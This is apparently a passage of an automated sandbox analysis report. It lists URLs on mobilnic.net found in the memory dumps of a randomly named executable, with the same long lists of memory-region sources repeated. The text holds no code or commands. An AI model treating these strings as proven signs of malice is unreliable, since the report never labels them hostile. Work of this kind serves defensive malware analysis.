              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1884
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1885
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1886
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=4
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=5
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=63
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=64
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=65
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=66
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=73
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=80
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=81
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=82
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=84
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=87
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/show_product.php?id=683
